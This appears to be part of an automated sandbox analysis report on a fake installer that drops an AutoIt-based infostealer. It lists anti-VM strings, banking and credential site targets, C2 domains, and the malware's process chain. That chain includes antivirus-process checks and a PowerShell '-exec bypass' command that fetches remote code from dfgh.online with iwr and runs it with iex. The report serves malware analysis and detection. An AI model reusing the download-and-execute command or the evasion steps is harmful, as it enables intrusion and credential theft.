                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696584680
                  Source: Lightweight.com, 00000017.00000002.2304957335.0000000000F35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                  Source: powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD1680000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696584680p
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696584680^
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696584680n
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696584680]
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696584680x
                  Source: TCCTL32.DLL.10.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696584680
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696584680s
                  Source: Lightweight.com, 00000017.00000002.2309158308.0000000003CBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696584680|UE
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696584680x
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696584680u
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696584680
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696584680
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696584680}
                  Source: powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                  Source: powershell.exe, 0000001C.00000002.2168777197.000000000895C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696584680x
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696584680t
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696584680
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696584680
                  Source: powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD1680000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: LLVMX86_FP80TypeKind
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696584680~
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696584680}
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696584680
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696584680h
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003D04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696584680p
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696584680
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696584680z
                  Source: Lightweight.com, 00000017.00000002.2309158308.0000000003CBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWF
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD1680000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: invalid PARAM usage_mesa_symbol_table_push_scope_mesa_symbol_table_add_global_symbol_mesa_symbol_table_add_symbolARB_ARB_position_invariantexpfog_linearexp2nicestprecision_hint_draw_buffersfastestfragment_coord_fragment_program_shadowpixel_center_integerorigin_upper_leftATI_fatal flex scanner internal error--no action foundfatal error - scanner input buffer overflowfatal flex scanner internal error--end of buffer missedout of dynamic memory in yy_get_next_buffer()input in flex scanner failedout of dynamic memory in _mesa_program_lexer__create_buffer()flex scanner push-back overflowout of dynamic memory in _mesa_program_lexer__scan_buffer()out of dynamic memory in _mesa_program_lexer_ensure_buffer_stack()bad buffer in _mesa_program_lexer__scan_bytes()out of dynamic memory in _mesa_program_lexer__scan_bytes()_mesa_program_lexer_set_column called with no buffer_mesa_program_lexer_set_lineno called with no bufferVMware, Inc.SOFTPIPE_USE_LLVMUnexpected PIPE_CAP %d query
                  Source: TCCTL32.DLL.10.drBinary or memory string: VMWare
                  Source: lang-1058.dll.10.drBinary or memory string: VMware Horizon Client
                  Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD1680000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: t2t1dst0t3dst2dst1dst3LLVMVoidTypeKindLLVMDoubleTypeKindLLVMFloatTypeKindLLVMFP128TypeKindLLVMX86_FP80TypeKindLLVMLabelTypeKindLLVMPPC_FP128TypeKindLLVMFunctionTypeKindLLVMIntegerTypeKindLLVMArrayTypeKindLLVMStructTypeKindLLVMVectorTypeKindLLVMPointerTypeKindunknown LLVMTypeKindLLVMMetadataTypeKindVector [%u] of %s
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696584680o
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696584680f
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696584680
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696584680
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696584680j
                  Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696584680d
                  Source: lang-1058.dll.10.drBinary or memory string: VMware Player
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comProcess information queried: ProcessInformationJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Lightweight.com, 00000017.00000003.1840925208.0000000003BAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: prisonyfork.buzz
                  Source: Lightweight.com, 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: hummskitnj.buzz
                  Source: Lightweight.com, 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cashfuzysao.buzz
                  Source: Lightweight.com, 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: appliacnesot.buzz
                  Source: Lightweight.com, 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: screwamusresz.buzz
                  Source: Lightweight.com, 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: inherineau.buzz
                  Source: Lightweight.com, 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: scentniej.buzz
                  Source: Lightweight.com, 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rebuildeso.buzz
                  Source: Lightweight.com, 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: laborersquei.click
                  Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Expected Expected.cmd & Expected.cmdJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 709182Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E BetJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "brandon" M Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Effective + ..\Certificates + ..\Stones + ..\Harder + ..\Planners + ..\Suppose NJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com Lightweight.com NJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; Jump to behavior
                  Source: Lightweight.com, 00000017.00000000.1571844510.0000000000AD3000.00000002.00000001.01000000.00000009.sdmp, Lightweight.com, 00000017.00000003.1850647478.0000000004123000.00000004.00000800.00020000.00000000.sdmp, Organization.20.dr, Lightweight.com.13.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.comQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\Desktop\Read me before you start.txt VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
